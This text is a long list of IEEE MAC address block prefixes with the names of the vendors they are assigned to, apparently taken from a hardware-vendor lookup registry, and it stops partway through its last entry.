8C1F64A2D ACSL Ltd. 8C1F64301 Agar Corporation Inc. 8C1F64746 Sensus Healthcare 8C1F6445D Fuzhou Tucsen Photonics Co.,Ltd 8C1F64DFE Nuvation Energy 8C1F64C6B Mediana 8C1F64B01 noah 8C1F64C8F JW Froehlich Maschinenfabrik GmbH 8C1F6467F Hamamatsu Photonics K.K. 8C1F64E0E Nokeval Oy 8C1F645E5 Telemetrics Inc. 8C1F64426 eumig industrie-TV GmbH. 8C1F64D08 Power Electronics Espana, S.L. 8C1F64C80 VECOS Europe B.V. 8C1F643D1 EMIT GmbH 8C1F64D7C QUERCUS TECHNOLOGIES, S.L. 8C1F64552 Proterra, Inc 8C1F642C3 TeraDiode / Panasonic 8C1F645B3 eumig industrie-TV GmbH. 8C1F64721 M/S MILIND RAMACHANDRA RAJWADE 8C1F64939 SPIT Technology, Inc 8C1F64E4C TTC TELEKOMUNIKACE, s.r.o. 8C1F649BA WINTUS SYSTEM 8C1F64A84 Beijing Wenrise Technology Co., Ltd. 8C1F6401E SCIREQ Scientific Respiratory Equipment Inc 8C1F6467A MG s.r.l. 8C1F64F4E ADAMCZEWSKI elektronische Messtechnik GmbH 8C1F64F52 AMF Medical SA 8C1F64905 Qualitrol LLC 8C1F64489 HUPI 70B3D5679 EMAC, Inc. 8C1F647AA XSENSOR Technology Corp. 8C1F6489E Cinetix Srl 8C1F64D92 Mitsubishi Electric India Pvt. Ltd. 8C1F64504 EA Elektroautomatik GmbH & Co. KG 8C1F64A97 Integer.pl S.A. 8C1F6494E Monnit Corporation 8C1F641CB SASYS e.K. 8C1F649BD ATM SOLUTIONS 8C1F64837 runZero, Inc 8C1F644E0 PuS GmbH und Co. KG 8C1F64DD5 Cardinal Scales Manufacturing Co 8C1F64DC0 Pigs Can Fly Labs LLC 8C1F64525 United States Technologies Inc. 8C1F64FD4 EMBSYS SISTEMAS EMBARCADOS 8C1F6472A DORLET SAU 8C1F6409F MB connect line GmbH Fernwartungssysteme 8C1F6461F Lightworks GmbH 8C1F640D6 AVD INNOVATION LIMITED 8C1F64A9A Signasystems Elektronik San. ve Tic. Ltd. Sti. 8C1F641BF Ossia Inc 8C1F64B56 Arcvideo 8C1F64774 navXperience GmbH 8C1F64655 S.E.I. CO.,LTD. 8C1F64FCD elbit systems - EW and sigint - Elisra 8C1F64118 Automata GmbH & Co. KG 8C1F64C28 Tornado Spectral Systems Inc. 8C1F640B8 Signatrol Ltd 8C1F6455E HANATEKSYSTEM 8C1F64B4C Picocom Technology Ltd 8C1F646F4 Elsist Srl 8C1F646B3 Feritech Ltd. 8C1F64D52 Critical Software SA 8C1F64B3D RealD, Inc. 70B3D5E00 Jeaway CCTV Security Ltd,. 8C1F64C0C GIORDANO CONTROLS SPA 8C1F64472 Surge Networks, Inc. 8C1F64777 Sicon srl 8C1F64029 Hunan Shengyun Photoelectric Technology Co.,LTD 70B3D5D0E Beijing Aumiwalker technology CO.,LTD 8C1F6456D ACOD 8C1F64F04 IoTSecure, LLC 8C1F64CBE Circa Enterprises Inc 8C1F647DD TAKASAKI KYODO COMPUTING CENTER Co.,LTD. 8C1F64E21 LG-LHT Aircraft Solutions GmbH 8C1F64A94 Future wave ultra tech Company 8C1F648AA Forever Engineering Systems Pvt. Ltd. 8C1F6492D IVOR Intelligent Electrical Appliance Co., Ltd 8C1F6453F Velvac Incorporated 8C1F6470E OvercomTech 8C1F64CD6 USM Pty Ltd 8C1F6475F ASTRACOM Co. Ltd 8C1F64DAA Davetech Limited 8C1F648AC BOZHON Precision Industry Technology Co.,Ltd 8C1F648B5 Ashton Bentley Collaboration Spaces 8C1F641C2 Solid Invent Ltda. 8C1F6411F NodeUDesign 8C1F64227 Digilens 8C1F64AEF Scenario Automation 8C1F644B0 U -MEI-DAH INT'L ENTERPRISE CO.,LTD. 8C1F64C7C MERKLE Schweissanlagen-Technik GmbH 8C1F6483C Xtend Technologies Pvt Ltd 8C1F64DE1 Franke Aquarotter GmbH 8C1F64998 EVLO Stockage Énergie 8C1F64542 Landis+Gyr Equipamentos de Medição Ltda 8C1F64D4A Caproc Oy 8C1F64D3C "KIB Energo" LLC 8C1F641E3 WBNet 8C1F647A6 OTMetric 8C1F642A5 Nonet Inc 8C1F642C8 BRS Sistemas Eletrônicos 8C1F649CF ASAP Electronics GmbH 8C1F64372 WINK Streaming 8C1F64A4E Syscom Instruments SA 8C1F64166 Hikari Alphax Inc. 8C1F64575 Yu-Heng Electric Co., LTD 8C1F64A29 Ringtail Security 8C1F64EAC Miracle Healthcare, Inc. 8C1F640A8 SamabaNova Systems 8C1F643C4 NavSys Technology Inc. 8C1F64391 CPC (UK) 8C1F644DD Griffyn Robotech Private Limited 8C1F64000 Suzhou Xingxiangyi Precision Manufacturing Co.,Ltd. 8C1F64466 Intamsys Technology Co.Ltd 8C1F64FD1 Edgeware AB 8C1F64C2F Power Electronics Espana, S.L. 70B3D5A0C Lumiplan Duhamel 70B3D51ED SUS Corporation 70B3D5F40 HORIZON.INC 70B3D54D0 Codewerk GmbH 70B3D54ED Panoramic Power 70B3D5333 Orlaco Products B.V. 70B3D55B3 STENTORIUS by ADI 70B3D5EAA Druck Ltd. 70B3D511E KBPR LLC 70B3D596A Anello Photonics 70B3D5474 CTROGERS LLC 70B3D55B9 EIZO RUGGED SOLUTIONS 70B3D5DD0 Deep Secure Limited 70B3D5411 Mi-Fi Networks Pvt Ltd 70B3D5E5F CesiumAstro Inc. 70B3D571A MB connect line GmbH Fernwartungssysteme 70B3D5BC8 Loma Systems s.r.o. 70B3D52C5 MECT SRL 70B3D5DEF ISG Nordic AB 70B3D5196 YUYAMA MFG Co.,Ltd 70B3D58E9 COONTROL Tecnologia em Combustão LTDA EPP 70B3D5581 Thermokon Sensortechnik GmbH 70B3D5E42 Neusoft Reach Automotive Technology (Shenyang) Co.,Ltd 70B3D580A SENSING LABS 70B3D5829 Guan Show Technologe Co., Ltd. 70B3D502C Iylus Inc. 70B3D5373 Hangzhou Weimu Technology Co.,Ltd. 70B3D54D9 Coda Octopus Products Limited 70B3D5D52 Sensoronic Co.,Ltd 70B3D50E4 Walter Müller AG 70B3D5A02 GreenFlux 70B3D5CEB Xirgo Technologies LLC 70B3D5CA0 Xirgo Technologies LLC 70B3D5B27 Naval Group 70B3D58E5 Shanghai Armour Technology Co., Ltd. 70B3D5A16 devAIs s.r.l. 70B3D5E13 Suzhou ZhiCai Co.,Ltd. 70B3D581C QIT Co., Ltd. 70B3D5C30 Polskie Sady Nowe Podole Sp. z o.o. 70B3D5DB9 PULOON Tech 70B3D5F9D Teledyne API 70B3D5A61 Omsk Manufacturing Association named after A.S. Popov 70B3D5018 DELITECH GROUP 70B3D531A Terratel Technology s.r.o. 70B3D5395 ICsec S.A. 70B3D5DCB MIJIENETRTECH CO.,LTD 70B3D5C28 Mitech Integrated Systems Inc. 70B3D5CC7 SOtM 70B3D5540 KMtronic ltd 70B3D547D Shenyang TECHE Technology Co.,Ltd 70B3D57B5 VOCAL Technologies Ltd. 70B3D5176 Larraioz Elektronika 70B3D5668 Öresundskraft AB 70B3D5CEC Deltronic Security AB 70B3D5F90 Atman Tecnologia Ltda 70B3D5646 Xirgo Technologies LLC 70B3D5562 JD Squared, Inc. 70B3D54E2 Transit Solutions, LLC. 70B3D5B32 GridBeyond 70B3D53C9 Duerkopp-Adler 70B3D5988 Arris 70B3D5BDE CAST Group of Companies Inc. 70B3D5116 Momentum Data Systems 70B3D56D6 KMtronic ltd 70B3D55C0 Shenzhen Lianfaxun Electronic Technology Co., Ltd 70B3D564D SANMINA ISRAEL MEDICAL SYSTEMS LTD 70B3D53AB Camozzi Automation SpA 70B3D5322 PuS GmbH und Co. KG 70B3D544A CANON ELECTRON TUBES & DEVICES CO., LTD. 70B3D54F5 Orlaco Products B.V. 70B3D5195 Ci4Rail 70B3D5E37 Eurotempest AB 70B3D5F15 ARECA EMBEDDED SYSTEMS PVT LTD 70B3D5F59 KOREA SPECTRAL PRODUCTS 70B3D5534 Weihai Weigao Medical Imaging Technology Co., Ltd 70B3D53B4 YOUSUNG 70B3D59E9 LiveCopper Inc. 70B3D58A3 Loehnert Elektronik GmbH 70B3D5095 plc-tec AG 70B3D5612 Edge Power Solutions 70B3D59E5 Antek Technology 70B3D5D68 Tobi Tribe Inc. 70B3D55FE Grossenbacher Systeme AG 70B3D55C7 QSnet Visual Technologies Ltd 70B3D5886 MB connect line GmbH Fernwartungssysteme 70B3D587A Accolade Technology Inc 70B3D5DA7 Network Innovations 70B3D5AAB QUISS GmbH 70B3D58FE Selmatec AS 70B3D5B57 Shanghai Qinyue Communication Technology Co., Ltd. 70B3D52C8 SLAT 70B3D52F7 Military Research Institute 70B3D5E5A Cardinal Scales Manufacturing Co 70B3D5E83 Talleres de Escoriaza SA 70B3D517C Farmpro Ltd 70B3D5089 Kazdream Technologies LLP 70B3D5C7C Beijing Aumiwalker technology CO.,LTD 70B3D5DC4 Peter Huber Kaeltemaschinenbau AG 70B3D52D1 Integer.pl S.A. 70B3D52D9 ZPAS S.A. 70B3D567C Benchmark Electronics - Secure Technology 70B3D56C9 Redstone Sunshine(Beijing)Technology Co.,Ltd. 70B3D51CA inomatic GmbH 70B3D50B7 HAI ROBOTICS Co., Ltd. 70B3D553A Panoramic Power 70B3D5E9A Meta Computing Services, Corp 70B3D5481 STEP sarl 70B3D58FC Mianjie Technology 70B3D5744 PHYZHON Health Inc 70B3D53C1 thingdust AG 70B3D5DE1 Duplomatic MS spa 70B3D565F Axnes AS 70B3D5369 ALVAT s.r.o. 70B3D54CA PCB Piezotronics 70B3D53E7 JNR Sports Holdings, LLC 70B3D5541 Nanjing Pingguang Electronic Technology Co., Ltd 70B3D5979 eSMART Technologies SA 70B3D5614 QUALITTEQ LLC 70B3D56BD RCH Vietnam Limited Liability Company 70B3D51F2 YUYAMA MFG Co.,Ltd 70B3D5922 Adcole Space 70B3D5C2B YUYAMA MFG Co.,Ltd 70B3D562D elements 70B3D5244 DAT Informatics Pvt Ltd 70B3D5A6A Privafy, Inc 70B3D56C6 Abbott Diagnostics Technologies AS 70B3D56CE Eredi Giuseppe Mercuri SPA 70B3D558A ITK Dr. Kassen GmbH 70B3D588E RCH Vietnam Limited Liability Company 70B3D55D2 Contec Americas Inc. 70B3D56FC MI Inc. 70B3D534B LEAFF ENGINEERING SRL 70B3D593A Braemar Manufacturing, LLC 70B3D5F5D Potter Electric Signal Co. LLC 70B3D5E2A CONTES, spol. s r.o. 70B3D5899 Viotec USA 70B3D58E6 Mothonic AB 70B3D5EFC Absolent AB 70B3D5C95 Chengdu Meihuan Technology Co., Ltd 70B3D5034 Digital Systems Engineering 70B3D5262 OOO Research and Production Center "Computer Technologies" 70B3D53F8 The Fire Horn, Inc. 70B3D5306 LEMZ-T, LLC 70B3D58C0 SenseNL 70B3D5BB1 Lumiplan Duhamel 70B3D51CE Clear Flow by Antiference 70B3D5FFA Barracuda Measurement Solutions 70B3D5A24 Booz Allen Hamilton 70B3D589E Innovative Control Systems, LP 70B3D5DA2 ACD Elekronik GmbH 70B3D51B1 Shanghai Danyan Information Technology Co., Ltd. 70B3D5BDF H2O-YUG LLC 70B3D52D8 Unisight Digital Products 70B3D59A5 Softel 70B3D551A Shachihata Inc. 70B3D5E8B Dream D&S Co.,Ltd 70B3D5A98 Pantec AG 70B3D55D0 InterTalk Critical Information Systems 70B3D5E89 JSC Kaluga Astral 70B3D593B Changchun FAW Yanfeng Visteon Automotive Electronics.,Ltd. 70B3D5126 AddSecure Smart Grids 70B3D5017 FTG Corporation 70B3D5BA5 fpgalabs.com 70B3D5DE3 ETL Elektrotechnik Lauter GmbH 70B3D57BE Phytron GmbH 70B3D5A67 Gstar Creation Co .,Ltd 70B3D590E Maytronics Ltd. 70B3D5D27 Light field Lab 70B3D51C2 CENSIS, Uiversity of Glasgow 70B3D5366 Solarlytics, Inc. 70B3D5BFF Sunsa, Inc 70B3D538A KSE GmbH 70B3D5B19 Brayden Automation Corp 70B3D5691 PEEK TRAFFIC 70B3D5E5B Argosy Labs Inc. 70B3D5A6C Controles S.A. 70B3D5BFC Vishay Nobel AB 70B3D592C DISMUNTEL SAL 70B3D5F4B Chengdu Lingya Technology Co., Ltd. 70B3D5A38 Aditec GmbH 70B3D5FF6 Elektro Adrian 70B3D51EB Xavant 70B3D56E3 SHEN ZHEN QLS ELECTRONIC TECHNOLOGY CO.,LTD. 70B3D577A Tecsag Innovation AG 70B3D552A Dataflex International BV 70B3D5372 MATELEX 70B3D555F Deep BV 70B3D58C7 Henschel-Robotics GmbH 70B3D5170 Mutelcor GmbH 70B3D5832 Potter Electric Signal Co. LLC 70B3D5787 Den Automation 70B3D5C84 Linc Technology Corporation dba Data-Linc Group 70B3D5A6B xmi systems 70B3D5FB8 Hyannis Port Research 70B3D5D31 Solace Systems Inc. 70B3D579F Green Instruments A/S 70B3D5A74 Sadel S.p.A. 70B3D5C8A WTE Limited 70B3D5F17 VITEC 70B3D5CDA VITEC 70B3D5B00 HORIBA ABX SAS 70B3D5CDB Wuhan Xingtuxinke ELectronic Co.,Ltd 70B3D5BD0 SHS SRL 70B3D52A0 Airthings 70B3D567A Micatu 70B3D5E63 Potomac Electric Corporation 70B3D5970 Bintel AB 70B3D5726 ATGS 70B3D565E Season Electronics Ltd 70B3D5DED Simpulse 70B3D547A GlooVir Inc. 70B3D5496 Profcon AB 70B3D5398 SIPRO s.r.l. 70B3D5F48 HEITEC AG 70B3D58DF DORLET SAU 70B3D5BC9 Yite technology 70B3D55BA INFRASAFE/ ADVANTOR SYSTEMS 70B3D5D56 KRONOTECH SRL 70B3D5884 LG Electronics 70B3D5456 Technological Application and Production One Member Liability Company (Tecapro company) 70B3D59BF Xiris Automation Inc. 70B3D57CB KeyW Corporation 70B3D54FA Thruvision Limited 70B3D5AC0 RITEC 70B3D5EFF Carlo Gavazzi Industri 70B3D5E25 GJD Manufacturing 70B3D599B RCH ITALIA SPA 70B3D5019 Transit Solutions, LLC. 70B3D5B06 MULTIVOICE LLC 70B3D5C5F Clean-Lasersysteme GmbH 70B3D5444 AMS Controls, Inc. 70B3D5982 3S - Sensors, Signal Processing, Systems GmbH 70B3D540B QUERCUS TECHNOLOGIES, S.L. 70B3D51A4 DAVEY BICKFORD 70B3D5111 Leonardo Sistemi Integrati S.r.l. 70B3D57BA Decentlab GmbH 70B3D5BA6 Gluon Solutions Inc. 70B3D50F2 TrexEdge, Inc. 70B3D5C54 Flexsolution APS 70B3D569A Altaneos 70B3D5BC5 U&R GmbH Hardware- und Systemdesign 70B3D5DD3 VITEC 70B3D58A9 WoKa-Elektronik GmbH 70B3D56DE Ametek Solidstate Controls 70B3D500C EXARA Group 70B3D546E Zamir Recognition Systems Ltd. 70B3D5F1C Bavaria Digital Technik GmbH 70B3D5F50 Vectology,Inc 70B3D52FC Loanguard T/A SE Controls 70B3D5FF2 tiga.eleven GmbH 70B3D5633 OBSERVER FOUNDATION 70B3D50ED Lupa Tecnologia e Sistemas Ltda 70B3D5FD4 GETRALINE 70B3D5E17 SA Photonics 70B3D5199 Smart Controls LLC 70B3D5DF5 Beijing Huanyu Zhilian Science &Technology Co., Ltd. 70B3D5B7E Elbit Systems of America 70B3D56A2 Root Automation 70B3D5E6A MAC Solutions (UK) Ltd 70B3D54AC Microsoft Research 70B3D51F1 DIEHL Connectivity Solutions 70B3D5E1F THETA432 70B3D5CF0 SHENZHEN WITLINK CO.,LTD. 70B3D5B6E Edgeware AB 70B3D5E3B ComNav Technology Ltd. 70B3D5DB7 Pengo Technology Co., Ltd 70B3D5264 ifak technology + service GmbH 70B3D531F Elcoma 70B3D50B5 Capgemini Netherlands 70B3D543E Peloton Technology 70B3D5C70 Magnetek 70B3D5114 Project H Pty Ltd 70B3D5800 HeadsafeIP PTY LTD 70B3D5B76 ATL-SD 70B3D516A 4Jtech s.r.o. 70B3D54F6 DORLET SAU 70B3D5C2D Ensotech Limited 70B3D571E Motec Pty Ltd 70B3D524A Unmukti Technology Pvt Ltd 70B3D5765 LG Electronics 70B3D577D APG Cash Drawer, LLC 70B3D5048 AvMap srlu 70B3D5DD2 Insitu, Inc 70B3D519A WiSuite USA 70B3D554A Digital Instrument Transformers 70B3D525F COPPERNIC SAS 70B3D557A Rhythm Engineering, LLC. 70B3D5F21 dds 70B3D5FEE Kawasaki Robot Service,Ltd. 70B3D5686 Access Protocol Pty Ltd 70B3D5638 Parkalot Denmark ApS 70B3D51C9 MB connect line GmbH Fernwartungssysteme 70B3D58BB KST technology 70B3D5DA3 Voleatech GmbH 70B3D522D Leder Elektronik Design 70B3D5F88 ODAWARAKIKI AUTO-MACHINE MFG.CO.,LTD 70B3D5BCF APG Cash Drawer, LLC 70B3D5718 PEEK TRAFFIC 70B3D5C1F Behr Technologies Inc 70B3D5748 KDT 70B3D5ADC SODAQ 70B3D5A71 Samwell International Inc 70B3D5623 Beijing HuaLian Technology Co, Ltd. 70B3D5B8E UR FOG S.R.L. 70B3D5234 EDFelectronics JRMM Sp z o.o. sp.k. 70B3D57F9 Communication Systems Solutions 70B3D5F67 winsun AG 70B3D55CF PROEL TSI s.r.l. 70B3D5050 Compusign Systems Pty Ltd 70B3D597A Orion Corporation 70B3D50E1 MiWave Consulting, LLC 70B3D55A5 Rehwork GmbH 70B3D52A8 Dynamic Perspective GmbH 70B3D5966 dA Tomato Limited 70B3D5C35 Vibrationmaster 70B3D569C Keepen 70B3D5434 Wit.com Inc 70B3D56C3 BEIJING ZGH SECURITY RESEARCH INSTITUTE CO., LTD 70B3D5A94 ETA Technology Pvt Ltd 70B3D5EB4 Robotic Research, LLC 70B3D5907 NINGBO CRRC TIMES TRANSDUCER TECHNOLOGY CO., LTD 70B3D5C38 CRESPRIT INC. 70B3D523F ETA-USA 70B3D53C4 Hagiwara Solutions Co., Ltd. 70B3D5546 Sensefarm AB 70B3D5CFC VEILUX INC. 70B3D558E VEILUX INC. 70B3D59B4 MyoungSung System 70B3D5162 ESPAI DE PRODUCCIÓ I ELECTRÓNI 70B3D5B39 MB connect line GmbH Fernwartungssysteme 70B3D5D71 RZB Rudolf Zimmermann, Bamberg GmbH 70B3D5ED0 shanghai qiaoqi zhinengkeji 70B3D5F52 Alere Technologies AS 70B3D5DEA Advanced Ventilation Applications, Inc. 70B3D5960 HORIZON TELECOM 70B3D5A46 Foxconn 4Tech 70B3D53E6 machineQ 70B3D5968 LGM Ingénierie 70B3D55F1 Fater Rasa Noor 70B3D57EE ADVEEZ 70B3D5EEF TATTILE SRL 70B3D5248 GL TECH CO.,LTD 70B3D5C7D Metatronics B.V. 70B3D5D6E ard sa 70B3D577E Blue Marble Communications, Inc. 70B3D56B7 Grossenbacher Systeme AG 70B3D58FA DEA SYSTEM SPA 70B3D5F5F RFRain LLC 70B3D5722 UMAN 70B3D50AC RoboCore Tecnologia 70B3D521C Enyx SA 70B3D5D7C D.T.S Illuminazione Srl 70B3D55EF Star Systems International 70B3D52D4 CT Company 70B3D554B Brakels IT 70B3D5D62 Andasis Elektronik San. ve Tic. A.Ş. 70B3D5656 SonoSound ApS 70B3D5144 GS Elektromedizinsiche Geräte G. Stemple GmbH 70B3D5920 SLAT 70B3D58E3 DORLET SAU 001BC50BB Triax A/S 70B3D524E Chengdu Cove Technology CO.,LTD 70B3D57D0 Cubitech 70B3D5236 Monnit Corporation 70B3D5049 APP Engineering, Inc. 70B3D56D8 Shanghai YuanAn Environmental Protection Technology Co.,Ltd 70B3D57A5 Triton Electronics Ltd 70B3D575E Cardinal Health 70B3D52AE Alere Technologies AS 70B3D5704 Melecs EWS GmbH 70B3D55DE Hangzhou AwareTec Technology Co., Ltd 70B3D5EB3 KWS-Electronic GmbH 70B3D5525 Plantiga Technologies Inc 70B3D5340 Renesas Electronics 70B3D521B Lab241 Co.,Ltd. 70B3D5DBF Infodev Electronic Designers Intl. 70B3D5853 HGH SYSTEMES INFRAROUGES 70B3D50AF KMtronic ltd 70B3D54E1 Grupo Epelsa S.L. 70B3D5B17 Intesens 70B3D5A43 OLEDCOMM 70B3D5D7B Peter Huber Kaeltemaschinenbau AG 70B3D594A SHENZHEN WISEWING INTERNET TECHNOLOGY CO.,LTD 70B3D5A29 QIAGEN Instruments AG 70B3D5AF2 True Networks Ltd. 70B3D5207 Savari Inc 70B3D56E1 Shanghai Holystar Information Technology Co.,Ltd 70B3D5FE3 CSM MACHINERY srl 70B3D5032 iFreecomm Technology Co., Ltd 70B3D55DC FactoryLab B.V. 70B3D5F5E Selex ES Inc. 70B3D5A3A EPSOFT Co., Ltd 70B3D5BFB Sensor 42 70B3D5357 Movimento Group AB 70B3D5734 MANSION INDUSTRY CO., LTD. 70B3D5DC6 IDEM INC. 70B3D57A6 Electrolux 70B3D5FD6 Visual Fan 70B3D5813 Wavemed srl 70B3D5FF9 InOut Communication Systems 70B3D599C Enerwise Solutions Ltd. 70B3D500D Scrona AG 70B3D598F Spaceflight Industries 70B3D5E91 NAS Australia P/L 70B3D5566 Data Informs LLC 70B3D5616 Axxess Identification Ltd 70B3D5C37 Keycom Corp. 70B3D5B07 Arrowvale Electronics 70B3D59DD HumanEyes Technologies Ltd. 70B3D5D26 MI Inc. 70B3D563E RIKEN OPTECH CORPORATION 70B3D5255 Asystems Corporation 70B3D572E Maharsystem 70B3D5A88 Shangdong Bosure Automation Technology Ltd 70B3D5839 Rockwell Collins Canada 70B3D5EED COMM-connect A/S 70B3D5E7B Shenzhen SanYeCao Electronics Co.,Ltd 70B3D5DF8 RMA Mess- und Regeltechnik GmbH & Co.KG 70B3D5E96 Cellier Domesticus inc 70B3D5557 HEITEC AG 70B3D568C ND METER 70B3D57C9 Council Rock 70B3D5C42 CRDE 70B3D5548 DIGIVERV INC 70B3D5845 Harborside Technology 70B3D5E18 Plasmapp Co.,Ltd. 70B3D52A1 Blink Services AB 70B3D5CB3 KST technology 70B3D5359 Boutronic 70B3D5D43 EZSYS Co., Ltd. 70B3D507F Abalance Corporation 70B3D504E HUGEL GmbH 70B3D57F7 JASCO Applied Sciences Canada Ltd 70B3D56B2 CRDE 70B3D53FE Siemens Industry Software Inc. 70B3D56AF Sensorberg GmbH 70B3D5D20 Rheonics GmbH 70B3D5C22 Skyriver Communications Inc. 70B3D59B3 K&J Schmittschneider AG 70B3D5715 RIOT 70B3D5FDB Design SHIFT 70B3D595B SRS Group s.r.o. 70B3D5969 Emtel System Sp. z o.o. 70B3D5A9A Amphenol Advanced Sensors 70B3D514A ExSens Technology (Pty) Ltd. 70B3D5B48 DWQ Informatikai Tanacsado es Vezerlestechnikai KFT 70B3D5192 ASPT, INC. 70B3D5229 CONTROL SYSTEMS Srl 70B3D54E7 Digital Domain 70B3D520F Tieline Research Pty Ltd 70B3D5B04 Herrmann Datensysteme GmbH 70B3D5945 Symboticware Incorporated 70B3D5479 LINEAGE POWER PVT LTD., 70B3D5CE1 EA Elektroautomatik GmbH & Co. KG 70B3D5168 Biwave Technologies, Inc. 70B3D546C SHANGHAI CHENZHU INSTRUMENT CO., LTD. 70B3D5A48 Applied Satellite Engineering 70B3D5596 Mencom Corporation 70B3D5E16 China Entropy Co., Ltd. 70B3D5495 Fiem Industries Ltd. 70B3D58C3 Wyebot, Inc. 70B3D52B4 Foerster-Technik GmbH 70B3D5489 ard sa 70B3D59A1 ITS Industrial Turbine Services GmbH 70B3D5BF3 CG-WIRELESS 70B3D59DE System 11 Sp. z o.o. 70B3D5E50 Advanced Vision Technology Ltd 70B3D5A47 KANOA INC 70B3D5011 Sumer Data S.L 70B3D5AB8 HORIBA ABX SAS 70B3D5F9E International Center for Elementary Particle Physics, The University of Tokyo 70B3D53BF Star Electronics GmbH & Co. KG 70B3D5927 LG Electronics 70B3D5873 Vishay Nobel AB 70B3D53F0 Intervala 70B3D5063 PoolDigital GmbH & Co. KG 70B3D5661 DesignA Electronics Limited 70B3D52A2 Visualware, Inc. 70B3D5BD1 CableLabs 70B3D551C ATX Networks Corp 70B3D50E8 Grossenbacher Systeme AG 70B3D5EBE Sierra Pacific Innovations Corp 70B3D5724 Quan International Co., Ltd. 70B3D59CE Terragene S.A 70B3D5397 Guangxi Hunter Information Industry Co.,Ltd 70B3D5427 Key Chemical & Equipment Company 70B3D531C FINANCIERE DE L'OMBREE (eolane) 70B3D5EF8 DKS Dienstl.ges. f. Komm.anl. d. Stadt- u. Reg.verk. mbH 70B3D50C2 LOOK EASY INTERNATIONAL LIMITED 70B3D5DCC Eutron SPA 70B3D51B8 OES Inc. 70B3D585A BRUSHIES 70B3D561C Earth Works 70B3D5C5C Layer Logic Inc 70B3D590B Matrix Switch Corporation 70B3D5BAA Device Solutions Ltd 70B3D5C12 Beijing Wisetone Information Technology Co.,Ltd. 70B3D525A DEUTA-WERKE GmbH 70B3D594D SEASON DESIGN TECHNOLOGY 70B3D528E TEX COMPUTER SRL 70B3D5F8B IOOOTA Srl 70B3D5C62 WIZNOVA 70B3D513D Elsist Srl 70B3D5693 Altron, a.s. 70B3D5735 Swiss Audio 70B3D572C NuRi&G Engineering co,.Ltd. 70B3D5934 RBS Netkom GmbH 70B3D5D75 Hyundai MNSOFT 70B3D59FB Unicom Global, Inc. 70B3D5457 Vivaldi Clima Srl 70B3D5ECB Re spa - Controlli Industriali - IT01782300154 70B3D53BE MyDefence Communication ApS 70B3D5503 Itest communication Tech Co., LTD 70B3D5B09 FIRST LIGHT IMAGING 70B3D5C5D FOSHAN SHILANTIAN NETWORK S.T. CO., LTD. 70B3D5475 EWATTCH 70B3D55D6 BMT Messtechnik Gmbh 70B3D542A Critical Link LLC 70B3D5F03 GMI Ltd 70B3D5C6F nyantec GmbH 70B3D5987 AXIS CORPORATION 70B3D5976 Atonarp Micro-Systems India Pvt. Ltd. 70B3D554F Assembly Contracts Limited 70B3D5CD9 Peter Huber Kaeltemaschinenbau GmbH 70B3D5317 Iotopia Solutions 70B3D53E8 COSMOS web Co., Ltd. 70B3D5644 ATX Networks Corp 70B3D5D95 SANO SERVICE Co.,Ltd 70B3D597F BISTOS.,Co.,Ltd 70B3D5973 Autonomic Controls, Inc. 70B3D50CE Innominds Software Inc 70B3D5B62 Sakura Seiki Co.,Ltd. 70B3D5EDB Netfort Solutions 70B3D5197 Lattech Systems Pty Ltd 70B3D5F81 Littlemore Scientific 70B3D59AD Fortuna Impex Pvt ltd 70B3D55C4 TATTILE SRL 70B3D57A4 Potter Electric Signal Co. LLC 70B3D5238 Arete Associates 70B3D5C80 Link Care Services 70B3D5A19 Qualitronix Madrass Pvt Ltd 70B3D57B0 Medisafe International 70B3D5CCD Suzhou PowerCore Technology Co.,Ltd. 70B3D5E4F RWS Automation GmbH 70B3D5BD9 SolwayTech 70B3D5D05 Colmek 70B3D512F DSP4YOU LTd 70B3D5B23 Supervision Test et Pilotage 70B3D5B44 ENTEC Electric & Electronic Co., LTD. 70B3D5D66 Ascendent Technology Group 70B3D5615 JSC "OTZVUK" 70B3D5A4A Beijing Arrow SEED Technology Co,.Ltd. 70B3D5B59 FutureTechnologyLaboratories INC. 70B3D53A7 Varikorea 70B3D5F99 TEX COMPUTER SRL 70B3D53EF Vtron Pty Ltd 70B3D5FAA LogiM GmbH Software und Entwicklung 70B3D5448 B/E Aerospace, Inc. 70B3D5A5E ConectaIP Tecnologia S.L. 70B3D51B5 StarBridge, Inc. 70B3D50AE Norsat International Inc. 70B3D5AF7 DimoSystems BV 70B3D55CD MVT Video Technologies R + H Maedler GbR 70B3D5307 Energi innovation Aps 70B3D5C8B Asia Pacific Satellite Coummunication Inc. 70B3D59EC eSoftThings 70B3D51DD RF CREATIONS LTD 70B3D5CB2 SECLAB 70B3D58CF Dainichi Denshi Co.,LTD 70B3D5296 Rohde&Schwarz Topex SA 70B3D5FB0 Rohde&Schwarz Topex SA 70B3D5217 Tecnint HTE SRL 70B3D5FF3 Aplex Technology Inc. 70B3D565C Aplex Technology Inc. 70B3D5B99 DomoSafety S.A. 70B3D5B1D Safelet BV 70B3D5AAE Nuviz Oy 70B3D5C34 Technical Panels Co. Ltd. 70B3D51FE MobiPromo 70B3D5F0B RF Industries 70B3D5AA1 Shenzhen Weema TV Technology Co.,Ltd. 70B3D5E3E Sol Welding srl 70B3D562B Silicann Systems GmbH 70B3D51FD BRS Sistemas Eletrônicos 70B3D50BA Ayre Acoustics, Inc. 70B3D54AE Reinhardt System- und Messelectronic GmbH 70B3D57D9 ATOM GIKEN Co.,Ltd. 70B3D5E3D Leo Bodnar Electronics Ltd 70B3D5B26 INTEC International GmbH 70B3D58E4 Aplex Technology Inc. 70B3D5F13 MEDIAM Sp. z o.o. 70B3D5350 Tickster AB 70B3D5E2E Merz s.r.o. 70B3D5042 Coveloz Technologies Inc. 70B3D5179 ALTRAN UK 70B3D5804 PMT Corporation 70B3D5B31 Qwave Inc 70B3D58D3 PERFORMANCE CONTROLS, INC. 70B3D5194 Husty M.Styczen J.Hupert Sp.J. 70B3D52BB Automation Networks & Solutions LLC 70B3D599A KEVIC. inc, 70B3D5AE1 DimoCore Corporation 70B3D53C3 AIMCO 70B3D5766 Tirasoft Nederland 70B3D51C7 Hoshin Electronics Co., Ltd. 70B3D529B DermaLumics S.L. 70B3D5AC6 SMTC Corporation 70B3D5DB5 Xiamen Point Circle Technologh Co,ltd 70B3D5FBE Hanbat National University 70B3D5268 Cardinal Scale Mfg Co 70B3D59EF Cottonwood Creek Technologies, Inc. 70B3D5AF4 TATTILE SRL 70B3D576B EMPELOR GmbH 70B3D5FCC DIgSILENT GmbH 70B3D5428 Presentation Switchers, Inc. 70B3D5747 Eva Automation 70B3D58B9 Toptech Systems, Inc. 70B3D5F1A Sator Controls s.r.o. 70B3D5F2E Shanghai JCY Technology Company 70B3D538F Sorynorydotcom Inc 70B3D5FB6 KRONOTECH SRL 70B3D51A9 